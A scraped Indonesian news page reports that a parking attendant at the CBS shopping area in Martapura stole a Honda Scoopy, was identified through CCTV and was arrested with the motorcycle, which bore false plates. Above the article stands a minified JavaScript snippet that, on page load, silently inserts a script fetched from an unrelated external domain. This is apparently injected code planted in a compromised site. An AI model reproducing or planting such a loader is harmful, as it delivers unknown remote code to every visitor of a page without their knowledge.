(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Hukum dan Kriminal

Pencurian Motor di CBS Terungkap Lewat CCTV


KANALKALIMANTAN.COM, MARTAPURA – Bukannya mengamankan dan menjaga sepeda motor dari orang jahat, seorang juru parkir, MSB, malah menjadi pencuri sepeda motor.

Aksi MSB mencuri sepedamotor itu terekam CCTV, di lokasi parkir depan sebuah toko suvenir di Pertokoan Cahaya Bumi Selamat (CBS), Martapura, Kabupaten Banjar, Kamis, (6/8/2020) kemarin.

Dari rekaman CCTV tersebut, terlihat MSB yang berpropesi sebagai juru parkir itu membawa sepedamotor jenis Scoppy warna hitam cokelat No Pol DA 6743 PBF.

Adanya video tersebut memudahkan polisi bertindak. Kamis, (6/8/2020) pukul 20.00 Wita, Polsek Martapura Kota pun mengamankan MSB yang diketahui beralamat di Desa Tunggul Irang, Kecamatan Martapura Kota.

Diketahui pemilik sepeda motor tersebut adalah Juniar Kartika (51), warga Jalan Pangeran RT09 RW01, Kelurahan Pangeran, Kecamatan Banjarmasin Utara, Kota Banjarmasin.

Kapolsek Martapura Kota AKP Suroto, melalui Kanit Reskrim Iptu B Munthe, kepada Kanalkalimantam.com mengatakan modus yang mana saat sepedamotor tersebut diparkir oleh Juniar Kartika di depan toko Layla Pasar CBS Martapura, dengan posisi kunci tergantung di sepeda motor.

“Iptu B Munthe juga mengatakan, saat itu Juniar Kartika sedang berbelanja souvernir di Toko Layla, setelah selesai berbelanja kurang lebih sekitar dua jam, korban melihat sepedamotor miliknya sudah tidak ada lagi di tempat.

Dari keterangan korban, katanya, dia mencari dan menanyakan ke juru parkir (tersangka) mengatakan tidak tahu dan tidak melihat, sedangkan juru parkir yang lain, yang menjaga parkir di pasar CBS mengatakan melihat tersangka yang menggeser sepeda motor tersebut.

Namun, lanjutnya, tersangka tetap bersikeras mengatakan, ada menggeser sepedamotor, jenis lain dan bukan sepeda motor scoopy yang hilang, dan tersangka tetap bersikeras tidak ada menggeser sepeda motor korban.

Setelah dilakukan penyelidikan oleh anggota unit reskrim Polsek Martapura kota dipimpin Kapolsek Martapura Kota AKP Suroto dan Kanit reskrim Iptu Munthe, didapat informasi bahwa sepeda motor yg hilang jenis honda scoopy DA 6743 PBF warna hitam cokelat.

Lebih lanjut dikatakannya, dari keterangan adik MSB, ada disimpan oleh pelaku dan diserahkan kepada adiknya yang bernama AS warga desa Pingaran Ilir , Astambul Kabupaten Banjar, MSB mengatakan kepada adiknya bahwa sepeda motor tersebut didapatkan oleh pelaku dari hasil menagih utang kepada orang lain.

“Pelaku sudah kami amankan di Mapolsek Martapura Kota, berserta barang bukti sepeda motor honda scoopy yang sudah diganti plat nomor palsu,” pungkas Iptu B. Munthe (kanalkalimantan.com/wahyu)

 

 

Reporter: Wahyu
Editor: Dhani


Desy Arfianty

Recent Posts

5 Nama Pendaftar Bacalon Pilwali Banjarbaru ke PDIP

KANALKALIMANTAN.COM, BANJARBARU - Lima buah formulir pendaftaran diambil oleh lima orang bakal calon Pilkada 2024… Read More

4 jam ago

Acil Odah Resmi Lamar Golkar Maju Pilgub Kalsel 2024

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hj Raudatul Jannah alias Acil Odah untuk maju pada kontestasi Pemilihan… Read More

4 jam ago

Golkar Banjarbaru Buka Penjaringan Bakal Calon Wali Kota

KANALKALIMANTAN.COM, BANJARBARU - DPD Partai Golkar Kota Banjarbaru membuka pendaftaran bakal calon Wali Kota dan… Read More

5 jam ago

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

8 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

9 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

20 jam ago

This website uses cookies.